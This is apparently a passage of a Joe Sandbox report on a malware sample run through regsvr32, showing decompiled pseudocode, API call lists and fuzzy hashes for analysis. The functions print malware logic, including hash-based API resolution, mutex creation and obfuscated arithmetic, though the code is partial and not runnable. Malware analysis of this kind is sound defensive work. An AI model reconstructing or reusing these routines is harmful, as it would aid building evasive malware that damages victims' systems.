                                0x7ffc130e13e7
                                0x7ffc130e13f2
                                0x7ffc130e13fb
                                0x7ffc130e13fd
                                0x7ffc130e1401
                                0x7ffc130e1404
                                0x7ffc130e1406
                                0x7ffc130e140a
                                0x7ffc130e1412
                                0x7ffc130e1418
                                0x7ffc130e1458
                                0x7ffc130e1469
                                0x7ffc130e147a
                                0x7ffc130e1483
                                0x7ffc130e1489
                                0x7ffc130e1490
                                0x7ffc130e1499
                                0x7ffc130e14a0
                                0x7ffc130e14a3
                                0x7ffc130e14d1
                                0x7ffc130e14da
                                0x7ffc130e14e9
                                0x7ffc130e1501
                                0x7ffc130e1511

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapProcess$BoundaryDeleteDescriptorFilePrivilegeReadRelease
                                • String ID:
                                • API String ID: 3718122545-0
                                • Opcode ID: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                                • Instruction ID: 9d81bc32470b191a1162693f1a61b7586ffba95175970f3db8011de9cd3ecde5
                                • Opcode Fuzzy Hash: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                                • Instruction Fuzzy Hash: 3071BC73605BE58AD720CB15E048BEE77A8FB88B88F525035CB5D57B80EB38E551CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00737CF4 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 24%
                                			E00737CF4(void* __ebx, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, signed long long* __r9, signed int _a8, long long _a16, long long _a24, signed int* _a40) {
				void* _v40;
				char _v56;
				signed int _v64;
				signed int _v72;
				signed int _t31;
				signed int _t33;
				signed int _t39;
				signed int _t46;
				long long _t54;
				void* _t72;
				long long _t74;
				long long* _t75;
				void* _t81;
				signed long long* _t84;
				void* _t89;
				void* _t90;

				_t84 = __r9;
				_t54 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_t73 =  *0x73d458;
				_t75 = __r9;
				_t46 = r8d;
				_t89 = __rdx;
				_t90 = __rcx;
				if(__rdx == 0 || r8d == 0) {
					 *_t84 =  *_t84 & 0x00000000;
					 *_a40 =  *_a40 & 0x00000000;
					_t39 = 0;
				} else {
					E0073908C(0x4a75e5e7, __rax,  *((intOrPtr*)(_t73 + 0x10)));
					if(_t54 != 0) {
						 *_t54();
					}
					_t72 = _t90 + 0x72;
					r14d = 0x10;
					_t81 = _t90;
					L007347B0();
					E0073908C(0x8d72aad2, _t54,  *((intOrPtr*)(_t73 + 0x10)));
					if(_t54 != 0) {
						 *_t54();
					}
					_v64 = _v64 & 0x00000000;
					_a8 = _a8 & 0x00000000;
					_v72 = _v72 & 0x00000000;
					r8d = 0;
					_t31 = E00734F7C(_t46, _t89, _t72, _t81,  &_a8);
					_t39 = _t31;
					if(_t31 == 0x7a) {
						r8d = _a8;
						HeapAlloc(??, ??, ??);
						_t74 = _t54;
						if(_t54 == 0) {
							_t39 = 8;
						} else {
							_t18 =  &_v56; // 0xfb849f4f
							_v64 = r14d;
							_v72 = _t18;
							_t33 = E00734F7C(_t46, _t89, _t72, _t74,  &_a8); // executed
							_t39 = _t33;
							if(_t33 != 0) {
								HeapFree();
							} else {
								 *_t75 = _t74;
								 *_a40 = _a8;
							}
						}
					}
				}
				return _t39;
			}



















                                0x00737cf4
                                0x00737cf4
                                0x00737cf4
                                0x00737cf9
                                0x00737d0a
                                0x00737d14
                                0x00737d1b
                                0x00737d1e
                                0x00737d21
                                0x00737d27
                                0x00737e11
                                0x00737e1d
                                0x00737e20
                                0x00737d36
                                0x00737d3f
                                0x00737d47
                                0x00737d4d
                                0x00737d4d
                                0x00737d4f
                                0x00737d53
                                0x00737d5e
                                0x00737d61
                                0x00737d6f
                                0x00737d77
                                0x00737d7d
                                0x00737d7d
                                0x00737d7f
                                0x00737d84
                                0x00737d89
                                0x00737d94
                                0x00737d9c
                                0x00737da1
                                0x00737da6
                                0x00737da8
                                0x00737db2
                                0x00737db8
                                0x00737dbe
                                0x00737e0a
                                0x00737dc0
                                0x00737dc0
                                0x00737dd2
                                0x00737dd7
                                0x00737ddc
                                0x00737de1
                                0x00737de5
                                0x00737e02
                                0x00737de7
                                0x00737df3
                                0x00737df6
                                0x00737df6
                                0x00737de5
                                0x00737dbe
                                0x00737da6
                                0x00737e3c

                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • HeapAlloc.KERNEL32 ref: 00737DB2
                                • HeapFree.KERNEL32 ref: 00737E02
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocErrorFreeLast
                                • String ID: uJ
                                • API String ID: 796569475-2850656762
                                • Opcode ID: b9ef0ca706fd99b697d0d6878eb9cb5900bb783f814b50af44875247110de7d7
                                • Instruction ID: 908f9c11d0d2281a3aa465198ee2f86c0ed8e9a44099c47f187a5b9df93ece11
                                • Opcode Fuzzy Hash: b9ef0ca706fd99b697d0d6878eb9cb5900bb783f814b50af44875247110de7d7
                                • Instruction Fuzzy Hash: D1316B66718B8486EB28DF26E44475AB3A0FB98BD4F584425EF8947B1ADF3CC945CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0073A7A0 Relevance: 4.6, APIs: 3, Instructions: 88memorysynchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
                                			E0073A7A0(void* __edi, long long* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9) {
				void* __rsi;
				void* __rbp;
				intOrPtr _t25;
				void* _t32;
				intOrPtr _t36;
				void* _t37;
				void* _t46;
				long long* _t56;
				long long* _t57;
				long long _t58;
				intOrPtr _t72;
				long long _t74;
				void* _t82;
				void* _t83;
				intOrPtr* _t91;

				_t58 = __rbx;
				_t56 = __rax;
				_t46 = __edi;
				 *((long long*)(_t82 + 8)) = __rbx;
				_t83 = _t82 - 0x50;
				_t76 =  *0x73d458;
				_t72 =  *0x73d448;
				_t91 = __rcx;
				 *((intOrPtr*)(_t83 + 0x30)) = 0x18;
				_t36 = 0;
				 *((intOrPtr*)(_t83 + 0x40)) = 0;
				E0073908C(0xe9f8f8df, __rax,  *((intOrPtr*)( *0x73d458 + 0x20)));
				if(_t56 == __rbx) {
					_t25 = 0;
				} else {
					r9d = 0; // executed
					_t25 =  *_t56(); // executed
				}
				if(_t25 != _t36) {
					r9d = 0;
					 *((intOrPtr*)(_t83 + 0x88)) =  *_t91;
					_t57 = _t83 + 0x90;
					 *((long long*)(_t83 + 0x20)) = _t57;
					E00731000(_t36, _t37, _t46, _t57, _t58, _t83 + 0x88, _t76, 0x730000, _t72 + 0x741178);
					if(_t57 != _t58) {
						E0073908C(0x3ff22481, _t57,  *((intOrPtr*)(_t76 + 0x18)));
						if(_t57 == _t58) {
							_t74 = _t58;
						} else {
							CreateMutexW(); // executed
							_t74 = _t57;
						}
						if(_t74 != _t58) {
							E0073908C(0xc06f8334, _t57,  *((intOrPtr*)(_t76 + 0x18)));
							if(_t57 == _t58) {
								_t32 = 0x7f;
							} else {
								_t32 =  *_t57();
							}
							if(_t32 != 0xb7) {
								 *((long long*)(_t91 + 0x18)) = _t74;
								_t36 = 1;
							} else {
								E0073908C(0xa219a077, _t57,  *((intOrPtr*)(_t76 + 0x18)));
								if(_t57 != _t58) {
									 *_t57();
								}
							}
						}
						HeapFree();
					}
				}
				return _t36;
			}


















                                0x0073a7a0
                                0x0073a7a0
                                0x0073a7a0
                                0x0073a7a0
                                0x0073a7ac
                                0x0073a7b0
                                0x0073a7b7
                                0x0073a7be
                                0x0073a7c5
                                0x0073a7cd
                                0x0073a7cf
                                0x0073a7dc
                                0x0073a7eb
                                0x0073a804
                                0x0073a7ed
                                0x0073a7fd
                                0x0073a800
                                0x0073a800
                                0x0073a808
                                0x0073a812
                                0x0073a81d
                                0x0073a824
                                0x0073a838
                                0x0073a83d
                                0x0073a848
                                0x0073a857
                                0x0073a85f
                                0x0073a875
                                0x0073a861
                                0x0073a86e
                                0x0073a870
                                0x0073a870
                                0x0073a87b
                                0x0073a886
                                0x0073a88e
                                0x0073a894
                                0x0073a890
                                0x0073a890
                                0x0073a890
                                0x0073a89e
                                0x0073a8ba
                                0x0073a8bf
                                0x0073a8a0
                                0x0073a8a9
                                0x0073a8b1
                                0x0073a8b6
                                0x0073a8b6
                                0x0073a8b1
                                0x0073a89e
                                0x0073a8cc
                                0x0073a8cc
                                0x0073a848
                                0x0073a8e7

                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0073A800
                                • CreateMutexW.KERNELBASE ref: 0073A86E
                                • HeapFree.KERNEL32 ref: 0073A8CC
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: DescriptorSecurity$ConvertCreateErrorFreeHeapLastMutexString
                                • String ID:
                                • API String ID: 2454944130-0
                                • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction ID: 3976c3380d8546e155292f2d59766d536f13726a74561c788ff14df26c5ddcca
                                • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction Fuzzy Hash: 3131B0327046C5EAEB21DF51E4457DAB3A0F798784F4848229F8E43706DE3CE58AC752
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EB89C Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                Download Yara Rule
                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EB89C(void* __ecx) {
				void* __rbx;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t19;
				void* _t20;

				_t8 = __ecx;
				E00007FFC7FFC130EBDF4(_t7, _t9, ( *0x131241f8 & 0x000000ff) + 0x3893f, 0x1, _t19, _t20);
				if (E00007FFC7FFC130EC7DC() != 0) goto 0x130eb8cb;
				goto 0x130eb8df; // executed
				E00007FFC7FFC130EE090(( *0x131241f8 & 0x000000ff) + 0x3893f); // executed
				if (0 != 0) goto 0x130eb8dd;
				E00007FFC7FFC130EC838(_t8);
				goto 0x130eb8c7;
				return _t7;
			}









                                0x7ffc130eb89c
                                0x7ffc130eb8b9
                                0x7ffc130eb8c5
                                0x7ffc130eb8c9
                                0x7ffc130eb8cb
                                0x7ffc130eb8d2
                                0x7ffc130eb8d6
                                0x7ffc130eb8db
                                0x7ffc130eb8e4

                                APIs
                                • __isa_available_init.LIBCMT ref: 00007FFC130EB8B9
                                • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFC130EB8BE
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFC130EC7E0
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFC130EC7E5
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFC130EC7EA
                                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFC130EB8D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                • String ID:
                                • API String ID: 3388242289-0
                                • Opcode ID: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                                • Instruction ID: 2e6de87951bdce05e13e226305b4458111acbcaf336990c934c9e8c891d01c1f
                                • Opcode Fuzzy Hash: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                                • Instruction Fuzzy Hash: A2E09240F0CEAF06FD54266211522B81BD00F2532CF210475D8AD722C3CE0D74BAE635
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00735168 Relevance: 3.8, APIs: 3, Instructions: 92memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E00735168(void* __ecx, void* __ebp, signed long long __rbx, long long __rcx, void* __rdx, void* __r8, void* __r9, void* __r11, long long _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
				long long _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				void* _t42;
				void* _t49;
				void* _t50;
				void* _t51;
				long long _t59;
				signed long long _t61;
				signed long long _t75;
				void* _t76;
				long long _t77;
				void* _t89;
				void* _t91;
				intOrPtr* _t93;
				void* _t95;
				long long _t96;
				long long _t97;

				_t91 = __r11;
				_t89 = __r9;
				_t61 = __rbx;
				_t51 = __ebp;
				_t42 = __ecx;
				_a16 = __rbx;
				_a8 = __rcx;
				_t59 =  *0x73d458;
				_t50 = r8d;
				_t95 = __rdx;
				_t96 = __rcx;
				_t49 = 0;
				_v72 =  *((intOrPtr*)(_t59 + 8));
				_t8 = _t75 + 8; // 0x8
				r13d = _t8;
				HeapAlloc(??, ??, ??);
				_t77 = _t59;
				if(_t59 != 0) {
					_t41 = 0;
					if(_t50 != 0) {
						_t10 = _t95 + 0x20; // 0x734f21
						_t93 = _t10;
						while(1) {
							E007330A4(_t42, _t59, _t61, _t96, _t76, _t95 + (_t61 + _t61 * 4) * 8, _t91);
							_t97 = _t59;
							if(_t59 == 0) {
								break;
							}
							_t15 = _t93 - 8; // 0x5d415e4120c48348
							r9d =  *_t15;
							_t59 = _t77 + (_t75 + _t75 * 2) * 8;
							_v88 = _t59;
							_t38 = E00735638(_t41, _t42, _t51, _t61, _a8, _t97,  *_t93, _t89, _t91); // executed
							_a24 = _t38;
							HeapFree(??, ??, ??);
							_t40 = _a24;
							if(_t40 != 0) {
								_t96 = _a8;
								_t41 = _t41 + 1;
								_t49 = _t49 + _t40;
								_t93 = _t93 + 0x28;
								if(_t41 < _t50) {
									continue;
								}
							}
							break;
						}
						r13d = 8;
					}
					if(_t41 == _t50) {
						_v88 = _a64;
						r13d = E007392D4(_t41, _t42, _t49, _t61, _t77, _a48, _a56, _t91);
					}
					E0073885C(_t49, _t61, _t77, _t76);
					HeapFree(??, ??, ??);
				}
				return r13d;
			}

























                                0x00735168
                                0x00735168
                                0x00735168
                                0x00735168
                                0x00735168
                                0x00735168
                                0x0073516d
                                0x00735181
                                0x00735188
                                0x0073518b
                                0x00735196
                                0x0073519d
                                0x007351a8
                                0x007351ad
                                0x007351ad
                                0x007351b1
                                0x007351b7
                                0x007351bd
                                0x007351c3
                                0x007351c7
                                0x007351d2
                                0x007351d2
                                0x007351d6
                                0x007351e3
                                0x007351e8
                                0x007351ee
                                0x00000000
                                0x00000000
                                0x007351f0
                                0x007351f0
                                0x007351fd
                                0x0073520d
                                0x00735212
                                0x0073521f
                                0x00735226
                                0x0073522c
                                0x00735235
                                0x00735237
                                0x0073523f
                                0x00735241
                                0x00735243
                                0x00735249
                                0x00000000
                                0x00000000
                                0x00735249
                                0x00000000
                                0x00735235
                                0x00735250
                                0x00735250
                                0x00735258
                                0x00735277
                                0x00735281
                                0x00735281
                                0x00735289
                                0x00735296
                                0x00735296
                                0x007352b6

                                APIs
                                • HeapAlloc.KERNEL32 ref: 007351B1
                                • HeapFree.KERNEL32 ref: 00735296
                                  • Part of subcall function 007330A4: HeapAlloc.KERNEL32 ref: 00733108
                                  • Part of subcall function 00735638: SleepEx.KERNEL32(00000000,00735217), ref: 0073568F
                                  • Part of subcall function 00735638: HeapAlloc.KERNEL32 ref: 0073573B
                                • HeapFree.KERNEL32 ref: 00735226
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$Free$Sleep
                                • String ID:
                                • API String ID: 1163062789-0
                                • Opcode ID: 3a5c3fa052809e7fc05be192fc8f2ea2de74623612a3d96ea4b3a5664d0ead34
                                • Instruction ID: 1b570355a814479d072bc88a40fe64f60c2997af0e163230ad068f0ce848312f
                                • Opcode Fuzzy Hash: 3a5c3fa052809e7fc05be192fc8f2ea2de74623612a3d96ea4b3a5664d0ead34
                                • Instruction Fuzzy Hash: 2931AA76604F8196EB25DB52A84479AB3A1F788BC8F448026EE8D83715EF3CD54AC740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 007324B0 Relevance: 3.8, APIs: 3, Instructions: 91memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E007324B0(void* __ebx, void* __ecx, void* __eflags, long long __rbx, void** __rdx, long long __rsi) {
				signed long long _t29;
				int _t47;
				void* _t50;
				long long _t73;
				long long _t90;
				long long _t95;
				void* _t97;
				void* _t98;
				void* _t104;
				long long _t106;
				void* _t108;

				_t75 = __rbx;
				_t104 = _t97;
				 *((long long*)(_t104 + 8)) = __rbx;
				 *((long long*)(_t104 + 0x10)) = _t95;
				 *((long long*)(_t104 + 0x20)) = __rsi;
				_push(_t90);
				_push(_t108);
				_t98 = _t97 - 0x30;
				_t73 =  *0x73d458;
				_t5 = _t104 + 0x18; // 0xfb849f5f
				E00739A38(__ebx, _t73, __rbx, _t5, __rdx,  *((intOrPtr*)(_t73 + 8)));
				_t7 = _t98 + 0x70; // 0xfb849f8f
				_t29 = E00735BA4(_t7);
				_t8 = _t98 + 0x70; // 0xfb849f8f
				r13d = _t29;
				r13d = r13d - ((r13d - (0x24924925 * r13d >> 0x20) >> 1) + (0x24924925 * r13d >> 0x20) >> 2) * 7;
				E00735BA4(_t8);
				_t13 = _t98 + 0x70; // 0xfb849f8f
				_t18 = _t108 + 3; // 0x3
				_t47 = E007313EC(0x24924925, __ecx, _t18, _t73, _t75, _t13);
				_t106 = _t73;
				if(_t73 != 0) {
					_t19 = _t95 + 3; // 0x3
					_t20 = _t98 + 0x70; // 0xfb849f8f
					E007313EC(0x24924925, __ecx, _t19, _t73, _t75, _t20);
					if(_t73 != 0) {
						_t22 = _t108 + 0xd; // 0xd
						r8d = _t95 + _t22;
						_t50 = HeapAlloc(??, ??, ??); // executed
						_t90 = _t73;
						if(_t73 != 0) {
							 *((long long*)(_t98 + 0x20)) = _t106;
							L0073B158();
							 *__rdx = _t50;
						}
						HeapFree();
					}
					_t47 = HeapFree();
				}
				return _t47;
			}














                                0x007324b0
                                0x007324b0
                                0x007324b3
                                0x007324b7
                                0x007324bb
                                0x007324bf
                                0x007324c2
                                0x007324c8
                                0x007324cc
                                0x007324e3
                                0x007324ea
                                0x007324ef
                                0x007324f4
                                0x007324fe
                                0x00732503
                                0x0073251a
                                0x0073251d
                                0x00732522
                                0x00732535
                                0x00732541
                                0x00732546
                                0x0073254c
                                0x0073254e
                                0x00732551
                                0x00732556
                                0x00732561
                                0x00732563
                                0x0073256d
                                0x00732572
                                0x00732578
                                0x0073257e
                                0x00732594
                                0x00732599
                                0x0073259e
                                0x0073259e
                                0x007325a9
                                0x007325a9
                                0x007325b7
                                0x007325b7
                                0x007325dc

                                APIs
                                  • Part of subcall function 007313EC: HeapAlloc.KERNEL32 ref: 00731456
                                • HeapAlloc.KERNEL32 ref: 00732572
                                • HeapFree.KERNEL32 ref: 007325A9
                                • HeapFree.KERNEL32 ref: 007325B7
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocFree
                                • String ID:
                                • API String ID: 1379380650-0
                                • Opcode ID: 6319a469fd09f79597659ee7f8e00f8cd3230aed5a594dea25eb0ec95d591eb3
                                • Instruction ID: 7c292339d9ef3be8366ce4e338c411491568f1f9616483951fe6164963ee3545
                                • Opcode Fuzzy Hash: 6319a469fd09f79597659ee7f8e00f8cd3230aed5a594dea25eb0ec95d591eb3
                                • Instruction Fuzzy Hash: 9E318126704B8986EB05DB3AE84574977A5F788B84F898131AE5C87765EF3CE606C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EA970 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 80%
                                			E00007FFC7FFC130EA970(void* __rax, void* __rcx, signed int __rdi, long long __rsi, void* __r8, void* __r10, long long __r12) {
				void* __rbx;
				void* __rbp;
				void* __r13;
				void* __r14;
				void* __r15;
				void* _t99;
				void* _t103;
				void* _t105;
				signed int _t108;
				void* _t113;
				void* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				signed int _t123;
				long long _t125;
				intOrPtr _t132;
				signed long long _t133;
				signed long long _t136;
				signed int _t149;
				signed int _t150;
				long long _t168;
				void* _t171;
				long long _t172;
				void* _t176;
				void* _t177;
				void* _t180;
				void* _t182;
				long long _t184;
				void* _t186;
				void* _t188;
				void* _t190;

				_t182 = _t176;
				 *(_t182 + 0x18) = r8d;
				_t177 = _t176 - 0xa0;
				_t117 =  *((intOrPtr*)(_t177 + 0x148));
				r15d =  *(_t177 + 0x100);
				r14d =  *(_t177 + 0x110);
				_t172 = __rcx - 0x36e7;
				r15d = r15d + 0x119f;
				 *((long long*)(_t177 + 0xd0)) = __rcx - 0x44a;
				r10d = _t117 - 0x283;
				 *(_t177 + 0x84) = r15d;
				r13d = _t117 + 0x170;
				 *(_t177 + 0x80) = r10d;
				_t118 =  *((intOrPtr*)(_t177 + 0x138));
				r14d = r14d + 0x9d7;
				 *(_t177 + 0x88) = r14d;
				 *((long long*)(_t177 + 0x148)) = _t172;
				r8d = _t118 - 0x16a;
				r9d = _t118 + 0xd93;
				 *(_t177 + 0x100) = r8d;
				_t19 = _t136 + 0x2598; // 0x2598
				 *(_t177 + 0x110) = r9d;
				if (r13d - _t99 < 0) goto 0x130eae64;
				 *((long long*)(_t182 + 0x10)) = __rsi;
				 *((long long*)(_t182 - 0x30)) = __rdi;
				 *((long long*)(_t182 - 0x38)) = __r12;
				if (r15d == __r10 - 0x173a) goto 0x130eacf1;
				_t184 =  *((intOrPtr*)(_t177 + 0x130));
				r10d = 0x3a59;
				r9d = r10d;
				 *(_t177 + 0x28) = 0x38e9;
				 *(_t177 + 0x20) = r10w;
				_t108 = r10d;
				r8d = 0x23f6; // executed
				E00007FFC7FFC130E9AC0(_t136, __rcx, _t184, _t172, _t190); // executed
				r11d = _t172 + 0x37e1;
				r9d =  *(_t177 + 0x84);
				r10d = _t190 + 0x4c4;
				r8d = _t186 - 0x14c1;
				 *((long long*)(_t177 + 0x78)) = _t184;
				_t168 =  *(_t177 + 0x100) + 0x1555;
				 *((long long*)(_t184 + 0x340)) = _t19;
				r15d = r15d + 0xfffff21d;
				r9d = r9d + 0xfffff219;
				 *(_t184 + 0x28) =  *(_t184 + 0x28) |  *((intOrPtr*)(_t184 + 0x198)) + 0x0000329d | 0x0000666a;
				_t42 = _t136 + 0x27b2; // 0x27b2
				_t123 = _t42;
				 *(_t177 + 0x110) = _t123;
				 *(_t177 + 0x70) = _t123;
				r14d = _t186 - 0x17cd;
				 *(_t177 + 0x68) = r10d;
				 *((intOrPtr*)(_t177 + 0x60)) = r11d;
				 *(_t177 + 0x58) = _t136;
				 *(_t177 + 0x50) = __rdi;
				 *((long long*)(_t177 + 0x48)) =  *((intOrPtr*)(_t177 + 0xe0));
				_t125 =  *(_t177 + 0x110);
				 *((long long*)(_t177 + 0x40)) = _t168;
				 *((long long*)(_t177 + 0x38)) = _t125;
				 *((long long*)(_t177 + 0x30)) =  *((intOrPtr*)(_t177 + 0xd0)) + 0xfffff515;
				 *(_t177 + 0x28) = r14d;
				 *(_t177 + 0x20) = r15d;
				_t103 = E00007FFC7FFC130F8680(_t108, _t136,  *((intOrPtr*)(_t177 + 0x148)) + 0x30d5,  *(_t177 + 0x100) + 0xfffffda6, _t168, __r8, _t180, __r10, _t184, _t186, _t190); // executed
				 *_t125 =  *_t125 + _t103;
				 *(_t177 + 0x28) = 0x343a;
				r8d = 0x329d;
				 *(_t177 + 0x20) = _t188 + 0x40c;
				asm("out dx, eax");
				asm("invalid"); // executed
				 *((long long*)(_t184 + 0x358)) = _t125;
				 *( *_t184 + 0x1e0) =  *( *_t184 + 0x1e0) |  *((intOrPtr*)(_t184 + 0x1b0)) + 0x0000343a;
				r8d =  *(_t125 + 0x150);
				r8d = r8d ^ 0x000017cd;
				_t113 = r8d - _t108;
				if (_t113 >= 0) goto 0x130eabf1;
				if (_t113 != 0) goto 0x130eabe0;
				 *((long long*)(_t184 + 0x198)) =  *((intOrPtr*)(_t184 + 0x198)) + ( *(_t184 + 0xb8) ^ 0x000027b2);
				 *0x2032 =  *0x2032 + _t103;
				_t114 =  *((intOrPtr*)( *_t184 + 0x130)) - 0x2032;
				if (_t114 >= 0) goto 0x130eac25;
				if (_t114 != 0) goto 0x130eac17;
				 *(_t184 + 0x1b8) =  *(_t184 + 0x1c0) | 0x0000343a;
				_t149 =  *(_t177 + 0x80);
				r10d = _t186 - 0x4c4;
				_t132 =  *((intOrPtr*)(_t184 + 0x140));
				r8d = _t186 - 0x1a27;
				r11d = _t149 - 0xeb4;
				_t78 = _t132 + 0x150; // 0x1f2c350e8b48c4
				_t133 =  *_t78 * 0xc329ae00;
				_t150 =  *(_t177 + 0x100);
				 *(_t184 + 0x158) = _t133;
				 *(_t177 + 0x58) = _t133;
				r9d = _t150 + 0xefd;
				 *(_t177 + 0x50) = r10d;
				 *((intOrPtr*)(_t177 + 0x48)) = r11d;
				 *((long long*)(_t177 + 0x40)) = _t184;
				 *((long long*)(_t177 + 0x38)) = _t149 + 0x3f3;
				 *((long long*)(_t177 + 0x30)) = _t150 + 0x13da;
				 *(_t177 + 0x28) =  *(_t177 + 0x110);
				 *(_t177 + 0x20) = _t168 + 0x70c;
				_t105 = E00007FFC7FFC130F9610( *(_t177 + 0x110), _t149 + 0x3f3,  *((intOrPtr*)(_t177 + 0xe0)) + 0xfffff02e,  *((intOrPtr*)(_t177 + 0xe0)) + 0xb4, __r8, _t180, __r10, _t184, _t186, _t188, _t190, _t188, _t186, _t171, _t136); // executed
				return _t105;
			}


































                                0x7ffc130ea970
                                0x7ffc130ea973
                                0x7ffc130ea97f
                                0x7ffc130ea986
                                0x7ffc130ea994
                                0x7ffc130ea9a2
                                0x7ffc130ea9aa
                                0x7ffc130ea9b0
                                0x7ffc130ea9b7
                                0x7ffc130ea9be
                                0x7ffc130ea9c5
                                0x7ffc130ea9cd
                                0x7ffc130ea9d4
                                0x7ffc130ea9dc
                                0x7ffc130ea9e3
                                0x7ffc130ea9ea
                                0x7ffc130ea9f2
                                0x7ffc130ea9f9
                                0x7ffc130eaa00
                                0x7ffc130eaa07
                                0x7ffc130eaa0f
                                0x7ffc130eaa15
                                0x7ffc130eaa20
                                0x7ffc130eaa26
                                0x7ffc130eaa31
                                0x7ffc130eaa35
                                0x7ffc130eaa3c
                                0x7ffc130eaa42
                                0x7ffc130eaa4a
                                0x7ffc130eaa50
                                0x7ffc130eaa53
                                0x7ffc130eaa5f
                                0x7ffc130eaa65
                                0x7ffc130eaa68
                                0x7ffc130eaa6e
                                0x7ffc130eaa7a
                                0x7ffc130eaa81
                                0x7ffc130eaa89
                                0x7ffc130eaaa5
                                0x7ffc130eaaac
